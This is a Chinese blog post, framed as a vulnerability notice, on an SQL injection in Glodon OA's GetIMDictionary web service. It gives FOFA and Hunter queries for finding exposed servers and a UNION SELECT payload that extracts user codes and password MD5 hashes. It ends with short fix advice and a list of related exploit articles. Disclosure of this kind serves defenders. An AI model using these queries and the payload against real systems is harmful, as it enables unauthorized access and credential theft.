漏洞通告| 某大厂OA SQL注入漏洞

最新推荐文章于 2024-09-28 00:15:00 发布
最新推荐文章于 2024-09-28 00:15:00 发布
阅读量161 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80115097/article/details/134078835
版权

广联达OA介绍

广联达办公OA是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。

图片

资产收集

fofa:fid=”/yV4r5PdARKT4jaqLjJYqw==”或者body=”/Services/Identification/Server”
hunter:web.body=”/Services/Identification/Server/“

图片

漏洞点

广联达OA SQL注入漏洞位于 /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary 接口下,直接访问,页面会提示缺少参数key,说明存在SQL注入

图片

漏洞复现

payload:

key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --

效果如下:

图片

修复建议

1.问/Webservice/IM/Config/ConfigService.asmx/GetIMDictionary 地址的时候,可以让报错信息模糊化
2.对key参数的传参进行过滤

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

图片

没看够~?欢迎关注!

免费领取安全学习资料包!(私聊进群一起学习,共同进步)腾讯文档-在线文档icon-default.png?t=N7T8https://docs.qq.com/doc/DYlBlQ2xhaFBmamtq

黑客大佬
关注
专栏目录
广联达 Linkworks办公OA SQL注入+后台文件上传漏洞复现(HW0day)
0xSec
08-12 4010
​​由于 广联达 Linkworks办公OA GetIMDictionary接口未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。而msgbroadcastuploadfile.aspx 存在后台文件上传漏洞,攻击者通过SQL注入获取管理员信息后,可以登陆发送请求包获取服务器权限。
用友NC系统querygoodsgridbycode接口处SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
07-24 371
用友NC系统querygoodsgridbycode接口code参数存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。
{大厂漏洞 } OA产品存在SQL注入
zkaqlaoniao的博客
10-18 222
江苏叁拾叁-OA是由江苏叁拾叁信息技术有限公司开发的一款OA办公平台,主要有知识管理,工作流程,沟通交流,辅助办公,集成解决方案,应用支撑平台,基础支撑等功能。该系统也与江苏叁拾叁智慧农业研究院的农产品电商解决方案、社会化服务解决方案、乡村振兴解决方案等进行了深度融合。该漏洞存在于login下,username对接受的传参没有进行严格的过滤,从而导致SQL注入,攻击者可以利用该漏洞获取数据库敏感信息。POC(payload sqlmap梭哈来的)直接sqlmap梭哈来。
通达OA SQL注入漏洞【CVE-2023-4166】
holyxp的博客
08-10 4755
通达OA系统,即Offic Anywhere,又称为网络智能办公系统,是通达科技公司针对各行业办公与管理开发的办公应用系统。通达OA系统采用领先的B/S架构,采用基于WEB网络的开发方式,能够使得企业及个人办公不再受地域限制,实现信息化、自动化、移动化高效便捷办公。漏洞2(CVE-2023-4166)general/system/seal_manage/dianju/delete_log.php文件,对参数 DELETE_STR 的操作会导致 sql 注入。
金和OA SQL注入漏洞
CommputerMac的博客
10-20 556
金和OA协同办公管理系统C6软件,为北京金和网络股份有限公司 开发系统,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。金和OA GetTreeDate.aspx接口存在SQL注入漏洞,攻击者可利用该漏洞执行任意SQL语句,获取系统数据库敏感信息。时间延迟注入POC (延迟 5秒)
黑客必知:揭秘泛微OA SQL注入漏洞,轻松入侵系统的绝佳方法!
若把此心以学道,即身成佛有何难
08-15 422
有子曰:“其为人也孝弟,而好犯上者,鲜矣。不好犯上,而好作乱者,未之有也。君子务本,本立而道生。孝弟也者,其为仁之本与?”
广联达OA前台sql注入+后台文件上传漏洞复现分析
博客地址 www.sec0nd.top
08-15 2654
广联达OA前台sql注入+后台文件上传漏洞复现分析
泛微 Ecology OA SQL 注入漏洞通告
05-05
泛微 Ecology OA SQL 注入漏洞通告
漏洞通告 | ​Apache Spark UI命令漏洞;Grails远程代码漏洞;Confluence Questions漏洞
zz_tech的博客
07-23 1327
众至网络安全实验室推送漏洞预警:Apache Spark UI命令漏洞;Grails远程代码漏洞;Confluence Questions漏洞
漏洞通告 | Spring Cloud Function 拒绝服务漏洞;微软6月多个安全漏洞
zz_tech的博客
06-17 1340
Spring Cloud Function 拒绝服务漏洞;微软6月多个安全漏洞
SuiteCRM SQL注入漏洞复现(CVE-2024-36412)
0xSec
07-14 780
SuiteCRM存在SQL注入漏洞,未经身份验证的远程攻击者可以通过该漏洞拼接执行SQL注入语句,从而获取数据库敏感信息。
漏洞复现】广联达OA漏洞合集(信息泄露+SQL注入+文件上传)
做自己喜欢的事,并将其发挥到极致!
09-18 4020
广联达 Linkworks 办公OA(Office Automation)是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。广联达OA曝出多处漏洞,攻击者可通过该漏洞获取服务器敏感数据信息,注入恶意Payload获得服务器控制权限。
2022-10-10(通达OA SQL注入漏洞)
qq_45751902的博客
10-10 2058
经过测试发现过滤了单引号,对r字符进行转换成16进制,通过手工最终获得数据库用户名root。使用手工注入,经过测试发现过滤了单引号,对r字符进行转换成16进制(用户名是root)首先创建一个普通账户 lisi:lisi123456。中存在 一个$_GET[“id”];参数位置:SORT_ID,FILE_SORT。发现时间明显变长了,再此证明id没有被过滤。登录账号是admin,密码为空。利用条件:一枚普通账号登录权限。利用条件:11.5版本无需登录
广联达OA存在未授权导致敏感信息泄漏
The current road is different, love needs to distinguish between right and wrong
11-02 488
广联达Linkworks办公OA系统存在未授权接口从而引发敏感信息泄露,攻击者可通过此漏洞获取账号密码登录后台,造成其他影响。没有人规定,一朵花一定要成长成向日葵或者玫瑰。
漏洞通告| 广联达OA SQL注入漏洞获取用户名密码
zkaqlaoniao的博客
03-29 592
广联达办公OA是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-24 650
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
网络安全证书考取相关知识
aa98865646的博客
09-21 750
作者是个想进入网络安全行业发展的小白,目前没啥钱,是想自学以后挖漏洞赚钱的,看了这两个算是比较常见的证书看起来都要花不少钱的话,我感觉自己还是先自学一段时间再说吧,实战更重要,这些证书等以后有机会慢慢考吧,如果需要的话。欢迎大佬补充其他适合小白考取的证书,目前感觉4800+480的NISP一级证书比较适合在学校的小白,CISP的话再NISP考到二级以后再加钱4000就可以换成CISP了,NISP适合学生,CISP适合职场啊,不过都是要钱啊。
信息安全工程师(24)网络安全体系建设原则与安全策略
最新发布
m0_73399576的博客
09-28 671
信息安全工程师——网络安全体系建设原则与安全策略篇
泛微oa e-cology v9 browser.jsp sql注入漏洞
09-15
泛微OA E-Cology V9是一款常用的企业办公自动化系统,该系统的browser.jsp页面存在SQL注入漏洞SQL注入是一种常见的网络攻击技术,攻击者可以通过构造恶意的SQL语句来绕过系统的认证和授权机制,进而获取敏感数据...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值